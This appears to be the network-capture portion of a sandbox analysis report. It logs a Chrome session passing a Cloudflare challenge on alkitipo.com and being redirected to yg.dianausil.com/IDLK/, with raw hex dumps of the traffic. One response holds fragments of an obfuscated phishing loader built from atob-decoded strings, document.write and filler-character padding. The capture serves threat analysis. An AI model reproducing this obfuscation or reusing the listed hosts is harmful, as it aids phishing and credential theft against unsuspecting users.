                                                                      Data Ascii: tRWA0URxvESKr34uAyxS4MFAlfux67tWWtx5OAJsyfcIbkpMNb23IsJ49IRwTkxtFkkFbQKVYppty0IhEWzBCR6SadMIRhPWfxruEf$KV5OuJKT4ZIAJa9LAI8Gb9LsyWIQOx-IFIQvxKIES5S45O$IKS4OB88uJ4BWgIOILSITIKILbWWW7WfwW5W7gDkVwWkyf2WCynVEiOuOfuEFWSSsaNI7wjTcWVyWWzr4-YSOBNNK3kx5fTWJVt5x$Whm
                                                                      2025-03-19 10:30:03 UTC7737OUTData Raw: 45 2d 2d 4f 54 65 39 50 6e 39 56 66 6a 4b 73 77 70 35 49 53 72 54 56 6e 33 64 5a 77 58 6b 72 66 7a 42 47 41 58 6e 31 6e 4c 57 37 57 68 63 33 49 47 46 52 37 78 37 65 6b 6e 32 59 72 31 33 53 41 52 77 49 74 76 54 49 66 51 45 74 43 50 54 75 51 72 52 6b 45 54 4b 69 52 72 34 62 6b 57 52 4f 65 4a 4d 4f 6d 43 45 6e 77 43 43 77 50 65 75 6b 57 62 57 68 52 6b 61 59 59 76 35 66 41 69 57 49 32 34 79 66 4a 44 2d 32 43 57 57 44 78 6f 79 52 34 59 66 73 49 4e 65 6c 50 65 44 42 44 73 4e 64 31 61 38 34 61 38 59 30 62 6d 32 4f 69 30 4f 43 30 36 76 76 37 4a 56 2d 44 4b 65 6f 61 4e 59 74 65 46 72 77 55 49 4d 35 6a 50 76 39 5a 65 55 44 57 79 6e 43 45 42 5a 4d 52 79 79 4e 24 64 52 61 37 53 69 5a 69 58 56 77 4a 6e 51 7a 74 32 54 35 64 2d 32 72 58 2b 4c 6a 45 79 72 44 64 34 66 79
                                                                      Data Ascii: E--OTe9Pn9VfjKswp5ISrTVn3dZwXkrfzBGAXn1nLW7Whc3IGFR7x7ekn2Yr13SARwItvTIfQEtCPTuQrRkETKiRr4bkWROeJMOmCEnwCCwPeukWbWhRkaYYv5fAiWI24yfJD-2CWWDxoyR4YfsINelPeDBDsNd1a84a8Y0bm2Oi0OC06vv7JV-DKeoaNYteFrwUIM5jPv9ZeUDWynCEBZMRyyN$dRa7SiZiXVwJnQzt2T5d-2rX+LjEyrDd4fy
                                                                      2025-03-19 10:30:04 UTC135INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:30:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Content-Length: 5004
                                                                      Connection: close
                                                                      2025-03-19 10:30:04 UTC1594INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 42 41 75 45 5a 59 55 79 63 72 6f 57 71 39 53 46 47 6a 4c 4e 4b 5a 54 6b 62 47 68 75 7a 76 70 30 75 6a 2f 4a 32 31 50 59 6a 72 38 39 53 46 54 50 4c 61 52 58 7a 39 65 43 6a 70 4d 66 2f 6a 51 5a 66 56 58 76 30 45 73 45 57 74 74 33 47 59 50 76 70 32 45 67 62 74 32 43 77 47 75 43 4f 39 34 52 78 47 52 34 31 59 78 68 4a 43 50 6e 2f 55 54 6e 50 37 61 43 59 4e 36 30 54 31 74 38 6f 4d 4f 6d 6e 41 47 74 63 67 59 42 4e 52 44 6c 6c 49 67 57 4f 64 4e 50 75 4f 44 4e 61 75 72 7a 53 6a 72 72 63 50 33 49 4a 61 69 7a 79 52 4a 48 70 43 37 74 35 55 74 4b 65 2b 42 5a 45 67 34 68 56 56 39 63 58 78 4f 49 33 4f 53 68 41 65 74 56 52 64 30 52 36 77 72 4b 78 72 71 6e 69 32 31 54 44 63 43 68 53 7a 6f 79 6d 63 4a 71 30 30 4b 41 4a 38 77 48 62
                                                                      Data Ascii: cf-chl-out-s: BAuEZYUycroWq9SFGjLNKZTkbGhuzvp0uj/J21PYjr89SFTPLaRXz9eCjpMf/jQZfVXv0EsEWtt3GYPvp2Egbt2CwGuCO94RxGR41YxhJCPn/UTnP7aCYN60T1t8oMOmnAGtcgYBNRDllIgWOdNPuODNaurzSjrrcP3IJaizyRJHpC7t5UtKe+BZEg4hVV9cXxOI3OShAetVRd0R6wrKxrqni21TDcChSzoymcJq00KAJ8wHb
                                                                      2025-03-19 10:30:04 UTC1009INData Raw: 76 62 2b 57 78 72 6c 2f 6f 62 6d 70 71 62 65 33 71 35 71 50 69 72 50 42 70 6f 66 50 6c 64 6a 61 31 71 2b 76 78 64 75 7a 6f 4a 79 37 31 62 44 68 76 64 54 58 32 74 53 39 76 37 69 39 33 4f 57 6f 77 65 44 70 39 62 54 6d 73 76 54 45 36 64 7a 54 30 2f 50 36 30 67 44 57 2f 41 4d 41 32 63 57 2f 77 77 54 43 37 50 67 48 7a 75 4c 63 37 41 66 6d 34 63 34 44 38 78 66 78 43 65 58 32 49 51 2f 59 39 68 55 59 44 2b 34 6e 48 79 59 56 44 41 6f 72 47 51 44 39 35 79 6f 6e 4a 41 45 48 36 53 6f 59 39 76 6f 71 47 45 41 37 4b 68 62 2b 51 44 46 44 46 68 38 71 4b 54 78 45 51 53 4e 42 52 6b 31 44 52 44 51 4f 51 30 31 41 4c 56 51 53 4c 55 30 75 53 7a 31 66 48 53 34 35 47 30 46 6a 50 46 59 30 58 56 74 6e 52 55 73 38 4b 30 52 68 59 43 64 76 63 6e 67 78 59 30 56 6c 63 32 35 62 62 33 64
                                                                      Data Ascii: vb+Wxrl/obmpqbe3q5qPirPBpofPldja1q+vxduzoJy71bDhvdTX2tS9v7i93OWoweDp9bTmsvTE6dzT0/P60gDW/AMA2cW/wwTC7PgHzuLc7Afm4c4D8xfxCeX2IQ/Y9hUYD+4nHyYVDAorGQD95yonJAEH6SoY9voqGEA7Khb+QDFDFh8qKTxEQSNBRk1DRDQOQ01ALVQSLU0uSz1fHS45G0FjPFY0XVtnRUs8K0RhYCdvcngxY0Vlc25bb3d
                                                                      2025-03-19 10:30:04 UTC1369INData Raw: 36 61 51 75 4c 74 2b 6e 58 74 37 76 4b 37 43 66 35 79 57 76 6f 53 7a 68 61 7a 4b 74 34 57 36 76 63 79 46 69 74 4f 70 70 72 43 55 6d 72 47 58 6d 74 61 64 31 35 33 65 31 2b 4b 67 7a 36 4f 6d 31 61 6e 6f 33 39 61 73 37 4d 61 75 30 4b 2f 76 73 4e 53 78 36 76 72 4f 31 73 58 39 76 66 59 41 76 76 7a 77 39 73 4c 63 2f 50 4d 49 78 41 51 4f 78 73 30 4d 45 63 37 52 33 67 63 54 35 65 37 67 31 65 67 63 32 68 63 5a 32 52 6f 4c 34 66 6f 41 33 79 4d 6a 4a 69 50 6f 39 67 63 72 34 41 63 4d 36 76 45 56 4d 65 34 47 4e 52 59 37 4e 77 63 6d 4f 68 54 35 4b 54 73 42 4e 52 63 44 42 55 51 4a 4e 50 78 4a 4b 44 67 6a 4d 55 38 38 4a 6c 56 4e 55 69 73 51 46 30 59 61 53 41 38 56 53 42 6c 65 58 30 38 76 57 46 41 37 53 53 59 6b 56 69 70 67 61 45 4e 63 4d 57 38 6c 50 6e 55 78 4b 55 39 6b
                                                                      Data Ascii: 6aQuLt+nXt7vK7Cf5yWvoSzhazKt4W6vcyFitOpprCUmrGXmtad153e1+Kgz6Om1ano39as7Mau0K/vsNSx6vrO1sX9vfYAvvzw9sLc/PMIxAQOxs0MEc7R3gcT5e7g1egc2hcZ2RoL4foA3yMjJiPo9gcr4AcM6vEVMe4GNRY7NwcmOhT5KTsBNRcDBUQJNPxJKDgjMU88JlVNUisQF0YaSA8VSBleX08vWFA7SSYkVipgaENcMW8lPnUxKU9k
                                                                      2025-03-19 10:30:04 UTC1369INData Raw: 75 71 75 34 47 4d 72 6f 57 55 68 63 61 59 69 38 61 32 6f 59 79 47 7a 36 47 67 7a 72 36 31 30 74 62 43 6d 62 47 4f 78 71 33 61 32 39 36 67 6f 4b 50 69 32 37 43 6d 35 71 53 31 6f 75 75 6e 37 75 2f 76 30 65 79 39 33 73 58 49 38 75 57 7a 74 4c 4c 70 75 4e 62 4a 2f 76 59 44 42 51 54 6b 77 77 54 7a 38 77 33 55 39 73 44 64 35 68 45 50 46 41 7a 6d 47 42 54 50 7a 2f 4d 4f 48 52 34 67 33 52 38 56 32 4f 76 57 41 78 6f 53 35 69 63 4c 47 41 77 45 47 51 58 69 48 79 49 4c 41 2f 41 52 39 69 6f 76 45 68 6a 30 4e 50 55 59 2b 66 6f 4e 2b 53 59 39 4f 77 52 47 4b 7a 64 42 4b 51 63 71 49 43 39 54 4c 67 38 71 45 54 68 52 4b 52 6f 7a 50 54 78 4f 54 44 5a 4a 54 7a 30 66 55 57 49 6d 56 32 59 67 51 57 5a 74 4a 6c 6c 4d 54 32 5a 54 59 31 31 56 55 53 70 6c 53 6d 68 50 62 57 31 6e 54
                                                                      Data Ascii: uqu4GMroWUhcaYi8a2oYyGz6Ggzr610tbCmbGOxq3a296goKPi27Cm5qS1ouun7u/v0ey93sXI8uWztLLpuNbJ/vYDBQTkwwTz8w3U9sDd5hEPFAzmGBTPz/MOHR4g3R8V2OvWAxoS5icLGAwEGQXiHyILA/AR9iovEhj0NPUY+foN+SY9OwRGKzdBKQcqIC9TLg8qEThRKRozPTxOTDZJTz0fUWImV2YgQWZtJllMT2ZTY11VUSplSmhPbW1nT
                                                                      2025-03-19 10:30:04 UTC1257INData Raw: 68 67 34 54 46 78 4b 4c 4f 78 6f 79 4e 78 63 36 2f 7a 6f 79 6e 6b 4a 4c 56 72 4b 32 54 32 4a 75 63 30 64 69 68 31 4e 6a 6b 30 4b 57 31 36 4f 50 4a 72 4b 6e 61 75 61 4b 74 72 75 7a 6a 36 38 72 56 2b 66 69 36 38 37 69 32 39 66 65 32 75 74 57 39 39 38 48 46 78 41 51 41 33 51 54 45 43 4d 34 51 30 41 6a 36 7a 42 54 4f 44 2b 72 6f 30 75 30 63 31 39 6b 4b 33 66 34 58 33 79 55 61 34 51 2f 36 2f 75 4d 55 2f 67 73 70 47 54 45 4e 4a 77 63 43 49 6a 45 66 4a 53 7a 79 2b 43 30 48 4d 78 51 31 46 7a 2f 2b 50 51 35 45 4d 42 34 32 52 52 35 45 54 55 38 6a 4a 6b 4a 4e 54 56 52 52 45 54 67 56 45 68 55 5a 57 54 35 58 56 30 6c 4c 59 56 38 37 50 78 30 35 4e 7a 6c 6b 4a 78 35 59 61 6d 68 47 4b 57 34 6c 58 57 6b 75 57 48 46 52 4d 57 51 35 62 48 39 53 65 44 74 38 66 6e 46 78 50 33
                                                                      Data Ascii: hg4TFxKLOxoyNxc6/zoynkJLVrK2T2Juc0dih1Njk0KW16OPJrKnauaKtruzj68rV+fi687i29fe2utW998HFxAQA3QTECM4Q0Aj6zBTOD+ro0u0c19kK3f4X3yUa4Q/6/uMU/gspGTENJwcCIjEfJSzy+C0HMxQ1Fz/+PQ5EMB42RR5ETU8jJkJNTVRRETgVEhUZWT5XV0lLYV87Px05NzlkJx5YamhGKW4lXWkuWHFRMWQ5bH9SeDt8fnFxP3


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.649737104.21.5.1304431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:04 UTC1222OUTGET /?cf_captcha=verified HTTP/1.1
                                                                      Host: a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-User: ?1
                                                                      Sec-Fetch-Dest: document
                                                                      Referer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Cookie: cf_clearance=qNs1iY1VvRH90Ldoq1yEk.IxYRRXaV.XjHDpBJskUl4-1742380194-1.2.1.1-6JCfidD2ac1ldlMQ_J35HHpOaB1R2Qfd77afpZZaY6L38WJnRgGF3HbJn2.e_YfjrnLq4AbcuviEtgLFLi6GxCSB8fAreovMFHBRH6Kx8RGKvrKCYyQfc8HfmhPxpGL2V7RM3EsgKJOLmnmy1Isw5_Vffq.FczWDL_75R6f2X0vx5NM4V4Bns8PxfX1tyunl3.moUgvDLgJ5359Rrbq327WTEaCVdGApZaHTZmOf2cDxSH5swKuN_8jCjL4biGArDXjPSayB0.RkwzX9HXl6OgpoNmb9_5CaiJINx7tyLyG9UPpR0yTi7d3NcTC9QiBUu0H7HmviVAp6BwdbyYbgI1CAcAcGxz7hqx4aE5i64jA
                                                                      2025-03-19 10:30:04 UTC846INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 19 Mar 2025 10:30:04 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cf-Ray: 922c4ad3be5f7da6-FRA
                                                                      Server: cloudflare
                                                                      Location: https://yg.dianausil.com/IDLK/
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EE0s6FsT7lwxNnQse86UaiawiFgKPfO%2BSiWBkkbmbMKI%2BHMGh028LLvJJlPlruhno8iCbZ01rDyz5QiORTpYw3PBcIBsHrhuIT78pJZSsDJ4gzW6DodSCqSHRAmqckZsPnZJKi61gfVo3GD0K7w0WPDygE7wbc3svg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Strict-Transport-Security: max-age=0
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=732&min_rtt=604&rtt_var=484&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1794&delivery_rate=1771253&cwnd=247&unsent_bytes=0&cid=9e8a98b42b2ebb53&ts=76&x=0"
                                                                      2025-03-19 10:30:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.649738104.18.94.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:04 UTC638OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/966088071:1742376849:e-pQSDz4Bmg_iVm7Jg9F7dZQ1GSaY_NvFcx7L8UKqvA/922c4a999a2565e0/bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:30:04 UTC442INHTTP/1.1 400 Bad Request
                                                                      Date: Wed, 19 Mar 2025 10:30:04 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 14
                                                                      Connection: close
                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      cf-chl-out: YZFTmIySbnmXGMtfo9pzQLNgMbqK5eD+uNDSfh82mgat8gdpv+TgYwQVOmQiQrxStiC0Vr0LsuK3zye44XCL4Q==$YDzH8YsqeGzjpJKeWaTYNA==
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4ad3cd42dbd4-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:30:04 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                                      Data Ascii: {"err":100280}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.649740172.67.214.1844431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:04 UTC735OUTGET /IDLK/ HTTP/1.1
                                                                      Host: yg.dianausil.com
                                                                      Connection: keep-alive
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-User: ?1
                                                                      Sec-Fetch-Dest: document
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Referer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:30:04 UTC1205INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:30:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, private
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vg7f3sGRD6loO5JEnjqxxMud%2FUOuh2%2BKdzUb34vmlp6%2B%2BgcnrSLejji2tYDLPpZtaNIHWYYgkZQnUYZzqTnIiFkTVMVZCG6nsyWFgHDRJ7KSomMcXaStP88Np1pA"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=9966&min_rtt=9966&rtt_var=3738&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1642&delivery_rate=285599&cwnd=32&unsent_bytes=0&cid=e660895b7814c1ac&ts=380&x=0"
                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6ImNKaSsxMGxCaGplVXdzbUNkRGJ2Smc9PSIsInZhbHVlIjoicW1Pd2xoeUNGdklyMk1SUjFrZnFNcjQvVkQ1N3VoY1BpeDNNYk9sZXptWHdTMWxyL2Z1cFdscityWG1jaGJCUTBjQm1YWkkzVHRocUhId0RwSWcvblI1L0M1cWVnSkh5NXUxNWNVdEFoTGRmaWRyQjFuQnBaWkhOOG8rVFkrMWkiLCJtYWMiOiI4ZjY5NWRjZDQxYjI2OGQwZjM2OTUxMDU2M2Q5MWUzN2U1ZDE5ODJiMjczOTk2NjY3NDBlODY4OGI4MjJmMjMwIiwidGFnIjoiIn0%3D; expires=Wed, 19-Mar-2025 12:30:04 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                      2025-03-19 10:30:04 UTC760INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 56 5a 51 55 4e 52 4d 31 6f 79 59 6e 67 31 51 6e 4e 33 61 45 52 47 57 6d 31 71 52 6c 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 6b 46 4e 64 45 74 78 53 54 5a 30 59 54 45 31 56 6c 56 75 57 48 42 4e 62 6b 74 36 55 33 64 53 52 33 6f 7a 65 48 42 33 51 30 67 78 64 55 39 71 52 45 77 79 56 30 64 79 5a 6e 52 55 64 48 4a 50 63 6c 5a 31 56 46 55 32 56 46 41 32 56 30 56 7a 53 55 46 42 63 44 68 4f 53 55 30 79 54 53 73 35 5a 54 52 74 54 6d 67 7a 65 6c 51 72 62 57 6c 49 62 58 46 42 56 6d 56 78 54 30 56 70 61 58 6c 78 55 45 68 50 63 32 39 4a 4d 54 56 49 4d 44 4a 45 51 7a 68 71 5a 30 74 5a 56 6c 70 45 57 44 41 35 5a 6b 56 4a 4f 45 73 77 53 30 49
                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlVZQUNRM1oyYng1QnN3aERGWm1qRlE9PSIsInZhbHVlIjoiMkFNdEtxSTZ0YTE1VlVuWHBNbkt6U3dSR3ozeHB3Q0gxdU9qREwyV0dyZnRUdHJPclZ1VFU2VFA2V0VzSUFBcDhOSU0yTSs5ZTRtTmgzelQrbWlIbXFBVmVxT0VpaXlxUEhPc29JMTVIMDJEQzhqZ0tZVlpEWDA5ZkVJOEswS0I
                                                                      2025-03-19 10:30:04 UTC1369INData Raw: 37 66 66 61 0d 0a 3c 73 63 72 69 70 74 3e 0a 77 57 48 71 56 41 48 73 5a 6f 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 34 55 33 45 75 5a 47 6c 68 62 6d 46 31 63 32 6c 73 4c 6d 4e 76 62 53 39 4a 52 45 78 4c 4c 77 3d 3d 22 29 3b 0a 4d 6f 51 4f 6e 51 55 47 74 71 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 71 68 54 4e 51 44 53 42 52 44 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 77 57 48 71 56 41 48 73 5a 6f 20 3d 3d 20 4d 6f 51 4f 6e 51 55 47 74 71 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 71 68 54 4e 51 44 53 42 52 44 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f
                                                                      Data Ascii: 7ffa<script>wWHqVAHsZo = atob("aHR0cHM6Ly84U3EuZGlhbmF1c2lsLmNvbS9JRExLLw==");MoQOnQUGtq = atob("bm9tYXRjaA==");qhTNQDSBRD = atob("d3JpdGU=");if(wWHqVAHsZo == MoQOnQUGtq){document[qhTNQDSBRD](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+Cjxo
                                                                      2025-03-19 10:30:04 UTC1369INData Raw: 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34
                                                                      Data Ascii: Wk776g776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g776g44Wk44Wk776g44Wk776g776g44Wk776g44Wk44Wk776g776g44Wk44Wk44Wk776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk44Wk776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g776g4
                                                                      2025-03-19 10:30:04 UTC1369INData Raw: 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34
                                                                      Data Ascii: k44Wk776g776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g44Wk776g776g44Wk776g44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk776g44
                                                                      2025-03-19 10:30:04 UTC1369INData Raw: 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36
                                                                      Data Ascii: 776g776g776g44Wk44Wk776g44Wk44Wk776g44Wk44Wk776g776g776g44Wk44Wk44Wk776g44Wk776g44Wk776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g776g44Wk776g44Wk776g776g776g776g776g44Wk776g776g776g44Wk776g776g44Wk776
                                                                      2025-03-19 10:30:04 UTC1369INData Raw: 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67
                                                                      Data Ascii: 76g44Wk776g776g776g776g776g776g776g44Wk776g776g776g44Wk776g776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk776g776g776g44Wk776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk776g44Wk776g44Wk44Wk44Wk776g44Wk776g776g776g776g44Wk44Wk44Wk776g44Wk776g776g
